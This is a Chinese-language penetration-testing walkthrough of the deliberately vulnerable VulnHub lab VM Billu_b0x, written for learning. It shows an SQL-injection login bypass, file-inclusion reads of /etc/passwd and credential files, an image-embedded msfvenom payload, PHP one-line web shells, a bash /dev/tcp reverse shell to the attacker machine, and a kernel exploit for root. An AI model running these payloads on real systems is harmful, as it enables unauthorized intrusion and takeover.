VulnHub渗透测试实战靶场 - Billu_b0x

环境下载

戳此进行环境下载

Billu_b0x靶机搭建

将下载好的靶机环境，用VMware导入，将靶机和攻击机的网络连接设置为NAT模式

渗透测试

信息搜集

用Kali中的arp扫描探测一下：sudo arp-scan -l

使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段C段IP：sudo nmap -sP 192.168.23.1/24

确定目标ip地址：192.168.23.130
用Nmap进行深度扫描：sudo nmap -sS -A 192.168.23.130 -oN billu.txt
发现目标开放了22端口和80端口

漏洞挖掘

访问80端口进入web首页，发现用户名口令输入框，并提示"Show me your SQLI skills"

漏洞挖掘思路：

• SQL注入：首页提示注入，想办法注入成功
• 暴破目录：用DirBuster暴破，看是否有新网页，找新漏洞
• 漏洞扫描：暴破的新网页，送进AWVS或APPScan扫漏洞
• 手动挖掘：暴破的新页面，通过Firefox挂burp代理，在burp中观察Request和Response包，手动找漏洞
• 查看每个网页的源码，看是否有提示
• 如得到用户名，密码，尝试登录ssh，如能连接上，无需反弹shell了

先用sqlmap进行测试：sqlmap -u http://192.168.23.130/ --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql，发现并没有什么效果

使用dirsearch扫描一下网站目录：python3 dirsearch.py -u 192.168.23.130 -e *.php，发现存在挺多200的页面

测试后发现在http://192.168.23.130/test.php存在文件包含

利用该漏洞，查看一下之前探测网站目录得到的php文件内容

• c.php

<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }

?>

• add.php

<?php


echo '<form  method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name=image>
	<input type=text name=name value="name">
	<input type=text name=address value="address">
	<input type=text name=id value=1337 >
    <input type="submit" value="upload" name="upload">
</form>';



?>

• index.php

<?php
session_start();

include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
	$_SESSION['logged']='';
	
}

if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{
	
	echo "you are logged in :)";
	header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> 
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
	$uname=str_replace('\'','',urldecode($_POST['un']));
	$pass=str_replace('\'','',urldecode($_POST['ps']));
	$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {

$row = mysqli_fetch_assoc($result);
	   echo "You are allowed<br>";
	   $_SESSION['logged']=true;
	   $_SESSION['admin']=$row['username'];
	   
	 header('Location: panel.php', true, 302);
   
}
else
{
	echo "<script>alert('Try again');</script>";
}
	
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";

?>

• test.php

?php


function file_download($download)
{
	if(file_exists($download))
				{
					header("Content-Description: File Transfer"); 
					
					header('Content-Transfer-Encoding: binary');
					header('Expires: 0');
					header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
					header('Pragma: public');
					header('Accept-Ranges: bytes');
					header('Content-Disposition: attachment; filename="'.basename($download).'"'); 
					header('Content-Length: ' . filesize($download));
					header('Content-Type: application/octet-stream'); 
					ob_clean();
					flush();
					readfile ($download);
				}
				else
				{
				echo "file not found";	
				}
	
}

if(isset($_POST['file']))
{
file_download($_POST['file']);
}
else{

echo '\'file\' parameter is empty. Please provide file path in \'file\' parameter ';
}

• panel.php

<?php
session_start();

include('c.php');
include('head2.php');
if(@$_SESSION['logged']!=true )
{
		header('Location: index.php', true, 302);
		exit();
	
}



echo "Welcome to billu b0x ";
echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>';
if(isset($_POST['lg']))
{
	unset($_SESSION['logged']);
	unset($_SESSION['admin']);
	header('Location: index.php', true, 302);
}
echo '<hr><br>';

echo '<form method=post>

<select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>';
if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}


if(isset($_POST['upload']))
{
	
	$name=mysqli_real_escape_string($conn,$_POST['name']);
	$address=mysqli_real_escape_string($conn,$_POST['address']);
	$id=mysqli_real_escape_string($conn,$_POST['id']);
	
	if(!empty($_FILES['image']['name']))
	{
		$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']);
	$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION);
	$image=array('jpeg','jpg','gif','png');
	if(in_array($r,$image))
	{
		$finfo = @new finfo(FILEINFO_MIME); 
	$filetype = @$finfo->file($_FILES['image']['tmp_name']);
		if(preg_match('/image\/jpeg/',$filetype )  || preg_match('/image\/png/',$filetype ) || preg_match('/image\/gif/',$filetype ))
				{
					if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name']))
							 {
							  echo "Uploaded successfully ";
							  $update='insert into users(name,address,image,id) values(\''.$name.'\',\''.$address.'\',\''.$iname.'\', \''.$id.'\')'; 
							 mysqli_query($conn, $update);
							  
							}
				}
			else
			{
				echo "<br>i told you dear, only png,jpg and gif file are allowed";
			}
	}
	else
	{
		echo "<br>only png,jpg and gif file are allowed";
		
	}
}


}

?>

• /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

审计得到的有关信息可以发现：

• 在/etc/passwd中，发现1个id 1000的账号ica，ssh连接的用户名可以是ica或root
• 在c.php中发现mysql连接用户名：billu，密码：b0x_billu以及数据库名：ica_lab

通过得到的mysql密码登录phpmyadmin，尝试后发现无法登录（原因在后面阐述）

重装环境之后再次用之前得到的信息登录，在ica_lab数据库的auth表中，找到web登录的用户名：biLLu，密码：hEx_it

getshell

获得root权限

继续暴破phpmy目录，文件包含phpmyadmin配置文件，由于phpmyadmin的默认的配置文件是config.inc.php，用之前文件包含的漏洞得到phpmyadmin的默认的配置文件的内容，得到用户为root，密码为roottoor

<?php
/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

/* End of servers configuration */

$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';


/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>

用xshell登录，得到root权限
之前mysql登不上检测后发现mysql状态为：mysql stop/waiting，推测mysql被之前的高线程目录暴破、扫描导致故障

获得非root权限

• 方式一：用phpmyadmin中得到的web页面登录账号密码登录

• 方式二：审计index.php源码，发现以下过滤规则：

$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));

str_replace的作用是将字符串\' 替换为空，因此构造SQL注入登录payload时，必须含有\'字符串，否则会报错，urldecode的作用是将输入解码，所以可以用Payload：用户名密码均为' or 1=1 -- \'，成功登入web页面

点击add user进入添加账号界面，这是一个图片上传漏洞点，利用图片上传和文件包含获得shell
查看之前利用文件包含漏洞获得的panel.php源码，发现panel.php存在本地文件包含漏洞

if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);
	}
	
}

用msf制作一个php马用来反弹shell：msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.128 lport=1234 -f raw > shell.php
把得到的php文件附加在一张图片的最后制作一张图片马，然后将图片马上传

msf起一个监听，利用burpsuite发包，成功获得反弹的shell，但是测试后发现输入的命令没有用（不知道为啥）

重新上传一个马，这次采用一句话马：<?php system($_POST['cmd']);?>，安装上面的思路用burpsuite发包

用bash反弹shell，将命令echo "bash -i >& /dev/tcp/192.168.23.128/1234 0>&1" | bash进行url编码%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%33%2e%31%32%38%2f%31%32%33%34%20%30%3e%26%31%22%20%7c%20%62%61%73%68，起一个监听，再次发包

提权

将shell升级为 tty，得到一个交互式的shell：python -c 'import pty;pty.spawn("/bin/bash")'
查看系统内核版本：uanme -a和cat /etc/issue

根据得到的内核相关信息，寻找可利用的exp：https://www.exploit-db.com/exploits/37292

为了方便上传exp，在文件上传目录uploaded_images为写一个马：

echo '<?php eval($_POST['d1no']);?>' >> d1no.php

利用蚁剑将exp上传上去，执行操作

1. 赋予执行权限：chmod 777 37292.c
2. 编译exp：gcc 37292.c -o exp
3. 执行exp，提权至root